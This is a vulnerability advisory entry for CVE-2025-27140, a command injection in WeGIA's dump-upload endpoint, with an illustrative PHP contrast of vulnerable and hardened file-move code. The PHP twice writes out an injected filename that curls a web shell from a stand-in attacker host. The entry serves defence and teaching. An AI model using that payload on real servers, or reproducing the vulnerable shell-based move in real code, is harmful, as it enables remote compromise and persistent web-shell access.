CVE-2025-27140
Published: 24 February 2025
Description
Adversaries may backdoor web servers with web shells to establish persistent access to systems.
Security Summary
CVE-2025-27140 is an OS command injection vulnerability (CWE-78, CWE-284) in WeGIA, a web application for managing charitable institutions. It affects versions prior to 3.2.15 and lies in the `importar_dump.php` endpoint, where the command that moves an uploaded temporary file is built from insufficiently sanitized request input, letting a remote attacker inject and execute arbitrary operating system commands.
With a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), the flaw is exploitable by any unauthenticated attacker who can reach the endpoint over the network, with low attack complexity and no user interaction. Successful exploitation yields remote code execution in the context of the web server process; in particular, tampering with the temporary-file move lets the attacker plant a web shell, leading to full server compromise with high impact on confidentiality, integrity, and availability.
Version 3.2.15 of WeGIA patches the issue. Additional mitigation details are provided in the GitHub security advisory (GHSA-xw6w-x28r-2p5c) and the specific patching commit (7d0df8c9a0b8b7d6862bbc23dc729d73e39672a1).
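As an added illustration of the bug class described above (not WeGIA's code, and not taken from the advisory or the patch commit), the PHP below reconstructs an upload handler that moves the temporary file by handing a string to the shell, next to a version that never touches a shell and never trusts the client-supplied name. The function names (`importDumpVulnerable`, `importDumpSafe`, `safeDumpName`), the `$upload`/`$baseDir` parameters, the allowlist pattern, and the constructed request are all assumptions for the example.

```php
<?php
// Added example: a reconstruction of the CWE-78 pattern in a file-move step
// of an upload handler. NOT WeGIA's code; all names here are assumptions.

// VULNERABLE PATTERN: the move is delegated to a shell via a string that
// embeds the client-supplied filename verbatim. $upload mirrors the shape of
// a $_FILES entry ('name' comes from the client, 'tmp_name' from PHP).
function importDumpVulnerable(array $upload, string $baseDir): string
{
    $dest = $baseDir . '/' . $upload['name'];
    // A name such as
    //   x.sql; curl http://attacker.example/sh.php -o /var/www/html/sh.php #
    // terminates the mv command and runs the rest as the web server user.
    // Returned as a string here instead of being passed to shell_exec().
    return 'mv ' . $upload['tmp_name'] . ' ' . $dest;
}

// HARDENED PATTERN, step 1: reduce the client name to a basename and accept
// only a strict allowlist of characters and extensions. Anything else is
// rejected outright rather than "cleaned up".
function safeDumpName(string $clientName): ?string
{
    $name = basename($clientName);
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\.sql(\.gz)?$/', $name)) {
        return null;
    }
    return $name;
}

// HARDENED PATTERN, step 2: no shell at all. move_uploaded_file() refuses
// any source path that is not a genuine PHP upload and performs the move
// in-process. The on-disk name is generated server-side, so even a name
// that passed the allowlist is never used to build a path.
function importDumpSafe(array $upload, string $baseDir): string
{
    if (safeDumpName($upload['name']) === null) {
        throw new InvalidArgumentException('rejected upload name');
    }
    $dest = $baseDir . '/' . bin2hex(random_bytes(8)) . '.sql';
    if (!move_uploaded_file($upload['tmp_name'], $dest)) {
        throw new RuntimeException('move failed');
    }
    return $dest;
}

// If a shell command is truly unavoidable, every interpolated value must at
// least go through escapeshellarg(); that is a fallback, not the fix.
function buildMoveCommandEscaped(string $src, string $dest): string
{
    return 'mv ' . escapeshellarg($src) . ' ' . escapeshellarg($dest);
}

// Demonstration on a constructed request. No real upload exists, so
// importDumpSafe() is not invoked; the validator and command builders are.
$evil = [
    'name'     => 'x.sql; curl http://attacker.example/sh.php -o /var/www/html/sh.php #',
    'tmp_name' => '/tmp/phpAbC123',
];
echo importDumpVulnerable($evil, '/var/www/html/dumps'), PHP_EOL;
var_dump(safeDumpName($evil['name']));
var_dump(safeDumpName('backup-2025.sql.gz'));
echo buildMoveCommandEscaped($evil['tmp_name'], '/var/www/html/dumps/' . $evil['name']), PHP_EOL;
```

The first `echo` prints the exact string a shell would receive in the vulnerable path, which makes the injected `curl` visible; the validator returns `null` for that name and a plain string for a well-formed one, and the escaped builder shows the same payload rendered harmless inside single quotes.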
MITRE ATT&CK Enterprise Techniques
Why these techniques?
OS command injection in a public-facing web application directly enables remote exploitation of that application (T1190), arbitrary command execution through the Unix shell (T1059.004), and the upload and use of a web shell for persistent access (T1505.003).